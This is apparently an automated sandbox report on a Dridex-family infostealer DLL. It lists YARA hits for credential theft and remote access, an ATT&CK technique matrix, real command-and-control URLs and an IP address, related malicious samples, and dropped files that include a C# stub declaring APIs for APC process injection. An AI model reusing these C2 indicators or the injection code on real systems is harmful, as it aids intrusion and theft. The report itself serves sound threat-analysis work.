Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2B5B.tmp" "c:\Users\user\AppData\Local\Temp\CSC8E8486282EA843C08CB8749684F1E69.TMP"	Jump to behavior

Source: explorer.exe, 0000001A.00000000.423589479.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.400779619.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.404531568.0000000000688000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanEXE^
Source: explorer.exe, 0000001A.00000000.404600031.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.417672396.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.424082918.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.404910870.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.424082918.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.404910870.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001A.00000000.425893659.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.400809333.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.404550743.000000000069D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 0000001A.00000000.401261783.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.424082918.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001A.00000000.404910870.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: WProgram Manager

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match	File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR
Source: Yara match	File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match	File source: 00000002.00000003.277089715.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277155521.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.327048178.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328107644.0000000004ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.323863639.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277582302.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277005147.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.276805211.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277047889.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.277544043.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.276930570.0000000004CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 1928, type: MEMORYSTR
Source: Yara match	File source: 2.3.rundll32.exe.4c86b40.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4c86b40.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4bda4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4c594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.4bda4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.326908581.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.396215708.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.394439164.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.395073730.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.326960112.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	812 Process Injection	1 Masquerading	1 Input Capture	11 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	31 Virtualization/Sandbox Evasion	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	812 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Rundll32	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3r0Cgcbr8c.dll	31%	ReversingLabs	Win32.Infostealer.Dridex
3r0Cgcbr8c.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
http://94.140.115.8/drew/50s8s_2Fm/cVudhHX9qhkwnZn8YGEa/1_2FluFvn0rgITgZHrA/wgcOmIc7KszdPMRNYAwCGU/riR21HHqBfnky/h3W8R7X2/i4XUx7MW7pUIRFpHREax99S/CeaSmQqUkf/_2FQJb20GfOBx67Hv/vcYd4qEFb5vs/GCAhrG_2F_2/Fs8jogZPWA_2BZ/E84C3VPBHuhbD17con0IW/u18AFJcaJWYZ53TT/SBbkABZO2lEW2gv/N0JCn4zxEtu_2BD1lC/F07n5Kpw2LWAlyB/hwLOToT.jlk	0%	Avira URL Cloud	safe
http://94.140.115.8/drew/WXsBbTk_2FBXBK/mS8Hu3n2DbeYWVwpxggIZ/cAzhqJf7aBOMcFyZ/ERg2cki7hXSFbet/cCn9kY_2Baq8v2FrSn/Rei5wg7J9/Qsu_2FMujMKTcbcDzJ0J/AhSY_2BVu9QQM_2FYvA/N7OdLSd3CjR0pY4_2FFyUB/GOmdiT9hoha13/v02bkkOg/EJzbMo_2FrexM_2BofdpAOE/xgFjJDpwMl/8SxBhJlVDNq8aMCyL/7JDY3gS5rUN7/gZQ5T5rpdKF/AFQ_2BiwFrwd7d/YmSmnBkM9/kco.jlk	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://94.140.115.8/drew/50s8s_2Fm/cVudhHX9qhkwnZn8YGEa/1_2FluFvn0rgITgZHrA/wgcOmIc7KszdPMRNYAwCGU/riR21HHqBfnky/h3W8R7X2/i4XUx7MW7pUIRFpHREax99S/CeaSmQqUkf/_2FQJb20GfOBx67Hv/vcYd4qEFb5vs/GCAhrG_2F_2/Fs8jogZPWA_2BZ/E84C3VPBHuhbD17con0IW/u18AFJcaJWYZ53TT/SBbkABZO2lEW2gv/N0JCn4zxEtu_2BD1lC/F07n5Kpw2LWAlyB/hwLOToT.jlk	true	Avira URL Cloud: safe	unknown
http://94.140.115.8/drew/WXsBbTk_2FBXBK/mS8Hu3n2DbeYWVwpxggIZ/cAzhqJf7aBOMcFyZ/ERg2cki7hXSFbet/cCn9kY_2Baq8v2FrSn/Rei5wg7J9/Qsu_2FMujMKTcbcDzJ0J/AhSY_2BVu9QQM_2FYvA/N7OdLSd3CjR0pY4_2FFyUB/GOmdiT9hoha13/v02bkkOg/EJzbMo_2FrexM_2BofdpAOE/xgFjJDpwMl/8SxBhJlVDNq8aMCyL/7JDY3gS5rUN7/gZQ5T5rpdKF/AFQ_2BiwFrwd7d/YmSmnBkM9/kco.jlk	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://https://file://USER.ID%lu.exe/upd	rundll32.exe, 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://constitution.org/usdeclar.txt	rundll32.exe, 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://constitution.org/usdeclar.txtC:	rundll32.exe, 00000002.00000003.384108620.0000000005AA8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000003.391842710.000001E9D2ABC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396816648.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.396935165.000001E5EFD1C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.140.115.8	unknown	Latvia		43513	NANO-ASLV	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	617154
Start date and time: 28/04/202210:34:16	2022-04-28 10:34:16 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	3r0Cgcbr8c (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.evad.winDLL@21/17@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 2 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 13.107.42.16
Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, settings-win.data.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com
Execution Graph export aborted for target mshta.exe, PID 6256 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:35:30	API Interceptor	1x Sleep call for process: rundll32.exe modified
10:36:08	API Interceptor	40x Sleep call for process: powershell.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NANO-ASLV	bKhQyaq7WP.exe	Get hash	malicious	Browse	94.140.115.224
	l0zzxRl556.exe	Get hash	malicious	Browse	94.140.115.224
	6DK0EB55d9.msi	Get hash	malicious	Browse	94.140.115.44
	ProjectsSheet.xls	Get hash	malicious	Browse	94.140.115.44
	ProjectsSheet.xls	Get hash	malicious	Browse	94.140.115.44
	ProjectsSheet.xls	Get hash	malicious	Browse	94.140.115.44
	SecuriteInfo.com.W32.Trojan.TCNN-1225.26439.exe	Get hash	malicious	Browse	91.203.69.240
	SNC-1823171407-Apr-6.xlsb	Get hash	malicious	Browse	94.140.115.210
	SNC-1823171407-Apr-6.xlsb	Get hash	malicious	Browse	94.140.115.210
	5f1hPXQgBa.exe	Get hash	malicious	Browse	94.140.114.207
	oZdVEauO18.exe	Get hash	malicious	Browse	94.140.114.229
	NFT-291422805-Mar-25.xlsb	Get hash	malicious	Browse	94.140.114.173
	NFT-291422805-Mar-25.xlsb	Get hash	malicious	Browse	94.140.114.173
	Compliance-Report-51318741-Mar-02.xlsb	Get hash	malicious	Browse	94.140.114.138
	Compliance-Report-51318741-Mar-02.xlsb	Get hash	malicious	Browse	94.140.114.138
	85585722.exe	Get hash	malicious	Browse	94.140.115.56
	75006628.exe	Get hash	malicious	Browse	94.140.115.56
	48677247.exe	Get hash	malicious	Browse	94.140.115.56
	OWPNio5jCW.exe	Get hash	malicious	Browse	94.140.115.56
	VIIapU4mPn.exe	Get hash	malicious	Browse	94.140.115.56

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
MD5:	243581397F734487BD471C04FB57EA44
SHA1:	38CB3BAC7CDC67CB3B246B32117C2C6188243E77
SHA-256:	7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
SHA-512:	1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
Malicious:	false
Preview:	PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\0hvnxdzw.0.cs

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	403
Entropy (8bit):	5.058106976759534
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
MD5:	99BD08BC1F0AEA085539BBC7D61FA79D
SHA1:	F2CA39B111C367D147609FCD6C811837BE2CE9F3
SHA-256:	8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
SHA-512:	E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

C:\Users\user\AppData\Local\Temp\0hvnxdzw.cmdline

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.282936552806951
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f/3zxs7+AEszIWXp+N23f/RAn:p37Lvkmb6KHX3WZE8Xyn
MD5:	9947AC7485445B4829E578281C5B77B7
SHA1:	A17954ACA53ACF072F8043307F6384B034E5AC21
SHA-256:	EFDB6F4867ACD44BE15B14863AC2837223E13D0D12C34C48D6F71FDB7EA2B32D
SHA-512:	A3B5685B751C1CA32D61B8DE597E48E804CD29ABE30B1339E4795232FC2C4193E151AA6B43BB3D5E3DFE875B4C6D3608C6536C0E34EC93047E03051154EE6272
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0hvnxdzw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0hvnxdzw.0.cs"

C:\Users\user\AppData\Local\Temp\0hvnxdzw.dll

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.618420487850574
Encrypted:	false
SSDEEP:	24:etGSo8OmU0t3lm85xWAseO4zkQ64pfUPtkZf04jVUWI+ycuZhN6GakSNXPNnq:6iXQ3r5xNO3QfUuJ04x31ulDa3fq
MD5:	C2E73EB34E95456E5277E7FC3955C190
SHA1:	F4B507A73E3E7117AD9C785883AE6FC71B10411B
SHA-256:	294D925E4F212BAD44A3AA93A9AF61106CB852B7CC71FB4F436BD0B8C135244C
SHA-512:	5341331781D246222396291D73C96DD1463625AE83AE1C0B4E44A23F13359FF8CD388EA4EB18A88BECC28257795A131A82F59A676CC93EBD454A7C234C4EE01F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....jb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a............3.0.....6.......C.......V...........

C:\Users\user\AppData\Local\Temp\0hvnxdzw.out

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.334966927585591
Encrypted:	false
SSDEEP:	24:AId3ka6KHUE8iuKaM5DqBVKVrdFAMBJTH:Akka6AUE8bKxDcVKdBJj
MD5:	9E41D48E95FDAB89B596FD48DBBFB577
SHA1:	F92F8FAB942D249DC0DA6F8EB90FF85B0435AD5D
SHA-256:	BA7A90A6E3E5B4C31B8451F114ADB6E74040042D3775788AF0BFA19884B84BE3
SHA-512:	4AEDA5916A2340F8CCDEEB8799F6B726207CB0D7B006B82A9573C8A62CDE14B36DBD489941B4BB8C014CBF8CB2065A14C6E4BC201DABC33D6BF4AED7B18CDA62
Malicious:	false
